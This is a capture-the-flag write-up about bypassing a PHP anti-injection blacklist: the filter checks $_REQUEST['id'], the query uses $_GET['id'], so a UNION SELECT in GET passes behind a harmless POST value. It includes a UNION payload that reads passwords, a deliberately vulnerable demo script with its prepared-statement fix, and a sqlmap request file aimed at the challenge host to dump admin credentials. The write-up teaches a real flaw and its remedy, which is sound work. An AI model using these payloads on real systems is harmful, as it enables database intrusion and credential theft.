A scanner sweep turns up robots.txt; visit http://xxx.com/robots.txt.
It lists an admin directory, but accessing it requires an account name and password.
Try http://xxx.com/index.phps instead (a .phps file is served as highlighted source rather than executed). This yields the following source code:
<?php
require_once 'lib.php';
header('X-XSS-Protection: 0');
$cols = array(
    "e8c4-437b-9476", "849e-416e-acf7", "7f9d-470f-8698", "c8bb-4695-93f7",
    "5fbc-4729-8821", "3ad3-46c3-b975", "f44f-4cc9-a5e0", "0c3f-42c8-a0ae"
);
if (isset($_REQUEST['id'])) {
    // The blacklist is applied to $_REQUEST['id'] ...
    // (the pattern's delimiter and flags are garbled in the extraction; the
    // alternation matches the tails of or/select/join/into/where/union)
    if (preg_match("/(?:\w*)\w*?[A-z].*(r|elect|oin|nto|here|nion)/", $_REQUEST['id'])) {
        die("Attack detected!!!");
    }
    // ... but the lookup is done with $_GET['id']
    $ad = get_ad($_GET['id']);
?>
<html>
<head>
<title>naughty ADS?1994</title>
</head>
<body bgcolor="white">
<center>
<?php echo $ad['description'] ?><br/>
<a href="/">Home</a>
</center>
</body>
</html>
<?php
    die;
}
?>
The input arrives through $_REQUEST['id'] and is screened by a "strict" regex, so an ordinary injection payload in that value is rejected. The query, however, is built from $_GET['id'], and its result is echoed into the page.
A bit of background. By default $_REQUEST contains the contents of $_GET, $_POST and $_COOKIE. Which sources are merged, and in what order, is governed by two php.ini directives: variables_order (default "EGPCS") and request_order, which overrides variables_order for $_REQUEST only and is set to "GP" in the stock php.ini-production.
The letters EGPCS stand for Environment, Get, Post, Cookie and Server, and their order is the order in which the sources are loaded: a later source overwrites an earlier one with the same name. In the default configurations the relative order is G then P, so whenever a POST parameter arrives it overwrites the GET parameter of the same name in $_REQUEST. (If request_order is left empty, variables_order applies and a cookie named id would likewise overwrite both, since C comes after G and P.)
Applied to this case: put the injection (a UNION SELECT, say) in the GET parameter id and send an innocuous id in the POST body. The filter sees the harmless POST value through $_REQUEST['id'] and lets the request through, while get_ad() is handed the malicious GET value when the query is made.
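The following script reproduces the mismatch end to end and shows the fix. It is an added example, not the challenge's index.php or lib.php: the sqlite tables ads and users and their rows are constructed, the mode switch is invented for the demo, the blacklist is a reconstruction of the page's garbled regex with the /i flag, and the concatenated query stands in for whatever get_ad() does in lib.php. It needs the pdo_sqlite extension.

```php
<?php
// Added example, not the challenge's code. Serve it with:
//   php -S 127.0.0.1:8080 request_confusion.php
// Assumed/constructed: the "ads" and "users" tables and rows, the "mode" switch,
// and the blacklist pattern (reconstructed from the page's garbled regex).

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE ads (id TEXT PRIMARY KEY, description TEXT)");
$pdo->exec("CREATE TABLE users (username TEXT, password TEXT)");
// Constructed sample data
$pdo->exec("INSERT INTO ads VALUES ('0c3f-42c8-a0ae', 'naughty ad #8'), ('e8c4-437b-9476', 'naughty ad #1')");
$pdo->exec("INSERT INTO users VALUES ('admin', 'constructed-admin-password')");

// Blacklist in the spirit of the page's filter: a letter followed somewhere by
// a fragment of or/select/join/into/where/union.
function looks_malicious(string $value): bool
{
    return preg_match('/\w*?[A-z].*(r|elect|oin|nto|here|nion)/i', $value) === 1;
}

header('Content-Type: text/plain');

// Which source won? With request_order=GP (php.ini-production) or the fallback
// variables_order=EGPCS, a POST "id" overwrites a GET "id" inside $_REQUEST.
printf("request_order=%s variables_order=%s\n", ini_get('request_order'), ini_get('variables_order'));
printf("GET id=[%s]  POST id=[%s]  REQUEST id=[%s]\n",
    $_GET['id'] ?? '', $_POST['id'] ?? '', $_REQUEST['id'] ?? '');

if (($_GET['mode'] ?? 'vulnerable') === 'vulnerable') {
    // Same bug as the challenge: the check reads one superglobal, the query another.
    if (isset($_REQUEST['id'])) {
        if (looks_malicious($_REQUEST['id'])) {
            die("Attack detected!!!\n");
        }
        $sql = "SELECT description FROM ads WHERE id = '" . ($_GET['id'] ?? '') . "'";
        echo "SQL: $sql\n";
        foreach ($pdo->query($sql) as $row) {
            echo $row['description'], "\n";
        }
    }
} else {
    // Hardened: read the value once, from the source the query actually uses,
    // allow-list its shape, and bind it. The blacklist is no longer load-bearing.
    $id = $_GET['id'] ?? null;
    if ($id === null || !preg_match('/^[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}$/', $id)) {
        http_response_code(400);
        die("bad id\n");
    }
    $stmt = $pdo->prepare("SELECT description FROM ads WHERE id = ?");
    $stmt->execute([$id]);
    foreach ($stmt as $row) {
        echo $row['description'], "\n";
    }
}
```

Exercise it with curl. A plain GET of id=0c3f-42c8-a0ae returns the ad; a GET of id=x%27+UNION+SELECT+password+FROM+users--+- on its own is rejected with "Attack detected!!!"; the same GET with -d 'id=0c3f-42c8-a0ae' added passes the filter (the diagnostic line shows REQUEST id equal to the POST value) and the UNION runs against the GET value, printing the constructed admin password. Append &mode=fixed to the same request and it is refused with a 400 because the hardened path validates the exact value it binds.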
Save the following request as test.txt and feed it to sqlmap with sqlmap -r test.txt. The * in the request line marks the injection point for sqlmap, and the harmless id in the POST body keeps the filter quiet:
POST /?id=* HTTP/1.1
Host: naughtyads.alieni.se
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

id=0c3f-42c8-a0ae
sqlmap dumps the admin account and password. Log in at http://xxxx.com/admin/, enter 555-31338 as the phone number, and submit to receive the flag.
Bypassing a hand-written anti-injection filter built on PHP $_REQUEST